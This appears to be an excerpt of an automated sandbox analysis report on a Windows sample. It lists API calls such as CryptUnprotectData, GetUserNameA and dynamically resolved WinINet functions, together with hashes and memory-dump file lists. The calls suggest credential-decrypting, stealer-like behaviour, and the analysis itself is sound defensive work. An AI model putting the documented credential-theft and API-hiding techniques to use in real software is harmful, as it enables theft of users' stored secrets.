Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: ca95fea9af964d45173b2d4a02625e37dbc6afe0accfcb2b60394ecc021d2ffa
Instruction ID: 7ce3ef12f6e99b8fb5ef4af3a55791508dd4dc09d4699a51feb05627cc285231
Opcode Fuzzy Hash: ca95fea9af964d45173b2d4a02625e37dbc6afe0accfcb2b60394ecc021d2ffa
Instruction Fuzzy Hash: 5911A0B0909218DBEB148B64CC45F99BB78F740711F104299E606936C0C7342A44CB51

Function 003A9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003A9B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 003A9BA3
LocalFree.KERNEL32(?), ref: 003A9BD3

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 63863cf588bd312eb667688b9590452ccff87f4825522a133694082d1012b8bd
Instruction ID: 4e7584bb138594342c81ea568d516ab549b8c91aee7f1d0005d44a34c12b9107
Opcode Fuzzy Hash: 63863cf588bd312eb667688b9590452ccff87f4825522a133694082d1012b8bd
Instruction Fuzzy Hash: EC11FAB8A00209EFCB04DFA4D989AAE77B5FF89300F104559E815AB350D770AE14CF61

Function 003B7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003A11B7), ref: 003B7880
RtlAllocateHeap.NTDLL(00000000), ref: 003B7887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 003B789F

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: da7e5585c4048b7f615881d89782d3ef4a17dbc8062c34ba39db14a8faeb2399
Instruction ID: f630604a35e1455837bf0cd4400051a5e92f29346092790403dd8fcac1cd4320
Opcode Fuzzy Hash: da7e5585c4048b7f615881d89782d3ef4a17dbc8062c34ba39db14a8faeb2399
Instruction Fuzzy Hash: 6CF044B1944248ABC704DF94DD85BAEBBB8E704711F100159F645A2680C77425048BA1

Function 003A1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 003A116A
ExitProcess.KERNEL32 ref: 003A117E

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: fd87c1d6d26d0a405fc13267d456ff188b6e987a298fce3d9b8137f62d1f62df
Instruction ID: ae161435ef44352e01885e97cbd58cbde00629c27850bb1fa97234391e5317df
Opcode Fuzzy Hash: fd87c1d6d26d0a405fc13267d456ff188b6e987a298fce3d9b8137f62d1f62df
Instruction Fuzzy Hash: 6AD05E7490030CDBCB04DFF0D8896DDBB78FB08312F000554E90562340EA306486CAA6

Function 003B9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76F70000,00F25A70), ref: 003B9C2D
GetProcAddress.KERNEL32(76F70000,00F25D10), ref: 003B9C45
GetProcAddress.KERNEL32(76F70000,00F38C28), ref: 003B9C5E
GetProcAddress.KERNEL32(76F70000,00F38CB8), ref: 003B9C76
GetProcAddress.KERNEL32(76F70000,00F3BE40), ref: 003B9C8E
GetProcAddress.KERNEL32(76F70000,00F3BEA0), ref: 003B9CA7
GetProcAddress.KERNEL32(76F70000,00F2ADA8), ref: 003B9CBF
GetProcAddress.KERNEL32(76F70000,00F3BF48), ref: 003B9CD7
GetProcAddress.KERNEL32(76F70000,00F3BED0), ref: 003B9CF0
GetProcAddress.KERNEL32(76F70000,00F3BEE8), ref: 003B9D08
GetProcAddress.KERNEL32(76F70000,00F3BFC0), ref: 003B9D20
GetProcAddress.KERNEL32(76F70000,00F25B30), ref: 003B9D39
GetProcAddress.KERNEL32(76F70000,00F25B70), ref: 003B9D51
GetProcAddress.KERNEL32(76F70000,00F25A50), ref: 003B9D69
GetProcAddress.KERNEL32(76F70000,00F25A90), ref: 003B9D82
GetProcAddress.KERNEL32(76F70000,00F3BE70), ref: 003B9D9A
GetProcAddress.KERNEL32(76F70000,00F3BF18), ref: 003B9DB2
GetProcAddress.KERNEL32(76F70000,00F2AC68), ref: 003B9DCB
GetProcAddress.KERNEL32(76F70000,00F25D30), ref: 003B9DE3
GetProcAddress.KERNEL32(76F70000,00F3BE88), ref: 003B9DFB
GetProcAddress.KERNEL32(76F70000,00F3BEB8), ref: 003B9E14
GetProcAddress.KERNEL32(76F70000,00F3BF30), ref: 003B9E2C
GetProcAddress.KERNEL32(76F70000,00F3BDE0), ref: 003B9E44
GetProcAddress.KERNEL32(76F70000,00F25AB0), ref: 003B9E5D
GetProcAddress.KERNEL32(76F70000,00F3BF00), ref: 003B9E75
GetProcAddress.KERNEL32(76F70000,00F3BF60), ref: 003B9E8D
GetProcAddress.KERNEL32(76F70000,00F3BF78), ref: 003B9EA6
GetProcAddress.KERNEL32(76F70000,00F3BDF8), ref: 003B9EBE
GetProcAddress.KERNEL32(76F70000,00F3BE10), ref: 003B9ED6
GetProcAddress.KERNEL32(76F70000,00F3C080), ref: 003B9EEF
GetProcAddress.KERNEL32(76F70000,00F3BF90), ref: 003B9F07
GetProcAddress.KERNEL32(76F70000,00F3BE58), ref: 003B9F1F
GetProcAddress.KERNEL32(76F70000,00F3BFA8), ref: 003B9F38
GetProcAddress.KERNEL32(76F70000,00F3CCA8), ref: 003B9F50
GetProcAddress.KERNEL32(76F70000,00F3BE28), ref: 003B9F68
GetProcAddress.KERNEL32(76F70000,00F3BFD8), ref: 003B9F81
GetProcAddress.KERNEL32(76F70000,00F25AD0), ref: 003B9F99
GetProcAddress.KERNEL32(76F70000,00F3BFF0), ref: 003B9FB1
GetProcAddress.KERNEL32(76F70000,00F25B10), ref: 003B9FCA
GetProcAddress.KERNEL32(76F70000,00F3C098), ref: 003B9FE2
GetProcAddress.KERNEL32(76F70000,00F3C008), ref: 003B9FFA
GetProcAddress.KERNEL32(76F70000,00F25850), ref: 003BA013
GetProcAddress.KERNEL32(76F70000,00F25750), ref: 003BA02B
LoadLibraryA.KERNEL32(00F3C020,?,003B5CA3,003C0AEB,?,?,?,?,?,?,?,?,?,?,003C0AEA,003C0AE3), ref: 003BA03D
LoadLibraryA.KERNEL32(00F3C038,?,003B5CA3,003C0AEB,?,?,?,?,?,?,?,?,?,?,003C0AEA,003C0AE3), ref: 003BA04E
LoadLibraryA.KERNEL32(00F3C050,?,003B5CA3,003C0AEB,?,?,?,?,?,?,?,?,?,?,003C0AEA,003C0AE3), ref: 003BA060
LoadLibraryA.KERNEL32(00F3C068,?,003B5CA3,003C0AEB,?,?,?,?,?,?,?,?,?,?,003C0AEA,003C0AE3), ref: 003BA072
LoadLibraryA.KERNEL32(00F3C0B0,?,003B5CA3,003C0AEB,?,?,?,?,?,?,?,?,?,?,003C0AEA,003C0AE3), ref: 003BA083
LoadLibraryA.KERNEL32(00F3C0C8,?,003B5CA3,003C0AEB,?,?,?,?,?,?,?,?,?,?,003C0AEA,003C0AE3), ref: 003BA095
LoadLibraryA.KERNEL32(00F3C170,?,003B5CA3,003C0AEB,?,?,?,?,?,?,?,?,?,?,003C0AEA,003C0AE3), ref: 003BA0A7
LoadLibraryA.KERNEL32(00F3C188,?,003B5CA3,003C0AEB,?,?,?,?,?,?,?,?,?,?,003C0AEA,003C0AE3), ref: 003BA0B8
GetProcAddress.KERNEL32(75840000,00F257D0), ref: 003BA0DA
GetProcAddress.KERNEL32(75840000,00F3C2C0), ref: 003BA0F2
GetProcAddress.KERNEL32(75840000,00F38708), ref: 003BA10A
GetProcAddress.KERNEL32(75840000,00F3C2F0), ref: 003BA123
GetProcAddress.KERNEL32(75840000,00F25690), ref: 003BA13B
GetProcAddress.KERNEL32(73B90000,00F2AFD8), ref: 003BA160
GetProcAddress.KERNEL32(73B90000,00F256B0), ref: 003BA179
GetProcAddress.KERNEL32(73B90000,00F2AD30), ref: 003BA191
GetProcAddress.KERNEL32(73B90000,00F3C1A0), ref: 003BA1A9
GetProcAddress.KERNEL32(73B90000,00F3C218), ref: 003BA1C2
GetProcAddress.KERNEL32(73B90000,00F25A10), ref: 003BA1DA
GetProcAddress.KERNEL32(73B90000,00F257B0), ref: 003BA1F2
GetProcAddress.KERNEL32(73B90000,00F3C320), ref: 003BA20B
GetProcAddress.KERNEL32(760B0000,00F25990), ref: 003BA22C
GetProcAddress.KERNEL32(760B0000,00F259B0), ref: 003BA244
GetProcAddress.KERNEL32(760B0000,00F3C230), ref: 003BA25D
GetProcAddress.KERNEL32(760B0000,00F3C248), ref: 003BA275
GetProcAddress.KERNEL32(760B0000,00F25650), ref: 003BA28D
GetProcAddress.KERNEL32(75D30000,00F2AE98), ref: 003BA2B3
GetProcAddress.KERNEL32(75D30000,00F2ADF8), ref: 003BA2CB
GetProcAddress.KERNEL32(75D30000,00F3C350), ref: 003BA2E3
GetProcAddress.KERNEL32(75D30000,00F25810), ref: 003BA2FC
GetProcAddress.KERNEL32(75D30000,00F257F0), ref: 003BA314
GetProcAddress.KERNEL32(75D30000,00F2AEC0), ref: 003BA32C
GetProcAddress.KERNEL32(753A0000,00F3C380), ref: 003BA352
GetProcAddress.KERNEL32(753A0000,00F25830), ref: 003BA36A
GetProcAddress.KERNEL32(753A0000,00F38668), ref: 003BA382
GetProcAddress.KERNEL32(753A0000,00F3C128), ref: 003BA39B
GetProcAddress.KERNEL32(753A0000,00F3C338), ref: 003BA3B3
GetProcAddress.KERNEL32(753A0000,00F25950), ref: 003BA3CB
GetProcAddress.KERNEL32(753A0000,00F25870), ref: 003BA3E4
GetProcAddress.KERNEL32(753A0000,00F3C1B8), ref: 003BA3FC
GetProcAddress.KERNEL32(753A0000,00F3C0F8), ref: 003BA414
GetProcAddress.KERNEL32(76DA0000,00F25710), ref: 003BA436
GetProcAddress.KERNEL32(76DA0000,00F3C200), ref: 003BA44E
GetProcAddress.KERNEL32(76DA0000,00F3C158), ref: 003BA466
GetProcAddress.KERNEL32(76DA0000,00F3C260), ref: 003BA47F
GetProcAddress.KERNEL32(76DA0000,00F3C278), ref: 003BA497
GetProcAddress.KERNEL32(77300000,00F256D0), ref: 003BA4B8
GetProcAddress.KERNEL32(77300000,00F25770), ref: 003BA4D1
GetProcAddress.KERNEL32(767E0000,00F258B0), ref: 003BA4F2
GetProcAddress.KERNEL32(767E0000,00F3C3B0), ref: 003BA50A
GetProcAddress.KERNEL32(6F6A0000,00F25930), ref: 003BA530
GetProcAddress.KERNEL32(6F6A0000,00F25970), ref: 003BA548
GetProcAddress.KERNEL32(6F6A0000,00F25730), ref: 003BA560
GetProcAddress.KERNEL32(6F6A0000,00F3C368), ref: 003BA579
GetProcAddress.KERNEL32(6F6A0000,00F25790), ref: 003BA591
GetProcAddress.KERNEL32(6F6A0000,00F25890), ref: 003BA5A9
GetProcAddress.KERNEL32(6F6A0000,00F25670), ref: 003BA5C2
GetProcAddress.KERNEL32(6F6A0000,00F259D0), ref: 003BA5DA
GetProcAddress.KERNEL32(6F6A0000,InternetSetOptionA), ref: 003BA5F1
GetProcAddress.KERNEL32(6F6A0000,HttpQueryInfoA), ref: 003BA607
GetProcAddress.KERNEL32(75760000,00F3C2D8), ref: 003BA629
GetProcAddress.KERNEL32(75760000,00F385E8), ref: 003BA641
GetProcAddress.KERNEL32(75760000,00F3C1D0), ref: 003BA659
GetProcAddress.KERNEL32(75760000,00F3C290), ref: 003BA672
GetProcAddress.KERNEL32(762C0000,00F258D0), ref: 003BA693
GetProcAddress.KERNEL32(70000000,00F3C140), ref: 003BA6B4
GetProcAddress.KERNEL32(70000000,00F259F0), ref: 003BA6CD
GetProcAddress.KERNEL32(70000000,00F3C398), ref: 003BA6E5
GetProcAddress.KERNEL32(70000000,00F3C3C8), ref: 003BA6FD

Strings

HttpQueryInfoA, xrefs: 003BA5FC
InternetSetOptionA, xrefs: 003BA5E5

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: cec7d008f3574b28eeb51e37eb0592596ab10c62ae9b7dc81ecb05b492b15e96
Instruction ID: a2c593482b961cc54ebc890b788c39e9718007f129d3581000630686bd3201d5
Opcode Fuzzy Hash: cec7d008f3574b28eeb51e37eb0592596ab10c62ae9b7dc81ecb05b492b15e96
Instruction Fuzzy Hash: FA626EB55042C0AFC74CDFB8EDC89563BF9F7AC301305851AA685CB265D639B48AFB12

Function 003A7710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003A7724
RtlAllocateHeap.NTDLL(00000000), ref: 003A772B
lstrcat.KERNEL32(?,00F39170), ref: 003A78DB
lstrcat.KERNEL32(?,?), ref: 003A78EF
lstrcat.KERNEL32(?,?), ref: 003A7903
lstrcat.KERNEL32(?,?), ref: 003A7917
lstrcat.KERNEL32(?,00F3ED50), ref: 003A792B
lstrcat.KERNEL32(?,00F3ECD8), ref: 003A793F
lstrcat.KERNEL32(?,00F3ED08), ref: 003A7952
lstrcat.KERNEL32(?,00F3EC18), ref: 003A7966
lstrcat.KERNEL32(?,00F391F8), ref: 003A797A
lstrcat.KERNEL32(?,?), ref: 003A798E
lstrcat.KERNEL32(?,?), ref: 003A79A2
lstrcat.KERNEL32(?,?), ref: 003A79B6
lstrcat.KERNEL32(?,00F3ED50), ref: 003A79C9
lstrcat.KERNEL32(?,00F3ECD8), ref: 003A79DD
lstrcat.KERNEL32(?,00F3ED08), ref: 003A79F1
lstrcat.KERNEL32(?,00F3EC18), ref: 003A7A04
lstrcat.KERNEL32(?,00F3EDD8), ref: 003A7A18
lstrcat.KERNEL32(?,?), ref: 003A7A2C
lstrcat.KERNEL32(?,?), ref: 003A7A40
lstrcat.KERNEL32(?,?), ref: 003A7A54
lstrcat.KERNEL32(?,00F3ED50), ref: 003A7A68
lstrcat.KERNEL32(?,00F3ECD8), ref: 003A7A7B
lstrcat.KERNEL32(?,00F3ED08), ref: 003A7A8F
lstrcat.KERNEL32(?,00F3EC18), ref: 003A7AA3
lstrcat.KERNEL32(?,00F3EE40), ref: 003A7AB6
lstrcat.KERNEL32(?,?), ref: 003A7ACA
lstrcat.KERNEL32(?,?), ref: 003A7ADE
lstrcat.KERNEL32(?,?), ref: 003A7AF2
lstrcat.KERNEL32(?,00F3ED50), ref: 003A7B06
lstrcat.KERNEL32(?,00F3ECD8), ref: 003A7B1A
lstrcat.KERNEL32(?,00F3ED08), ref: 003A7B2D
lstrcat.KERNEL32(?,00F3EC18), ref: 003A7B41
lstrcat.KERNEL32(?,00F3EEA8), ref: 003A7B55
lstrcat.KERNEL32(?,?), ref: 003A7B69
lstrcat.KERNEL32(?,?), ref: 003A7B7D
lstrcat.KERNEL32(?,?), ref: 003A7B91
lstrcat.KERNEL32(?,00F3ED50), ref: 003A7BA4
lstrcat.KERNEL32(?,00F3ECD8), ref: 003A7BB8
lstrcat.KERNEL32(?,00F3ED08), ref: 003A7BCC
lstrcat.KERNEL32(?,00F3EC18), ref: 003A7BDF
lstrcat.KERNEL32(?,00F3EF10), ref: 003A7BF3
lstrcat.KERNEL32(?,?), ref: 003A7C07
lstrcat.KERNEL32(?,?), ref: 003A7C1B
lstrcat.KERNEL32(?,?), ref: 003A7C2F
lstrcat.KERNEL32(?,00F3ED50), ref: 003A7C43
lstrcat.KERNEL32(?,00F3ECD8), ref: 003A7C56
lstrcat.KERNEL32(?,00F3ED08), ref: 003A7C6A
lstrcat.KERNEL32(?,00F3EC18), ref: 003A7C7E

Part of subcall function 003A75D0: lstrcat.KERNEL32(355A0020,003C17FC), ref: 003A7606
Part of subcall function 003A75D0: lstrcat.KERNEL32(355A0020,00000000), ref: 003A7648
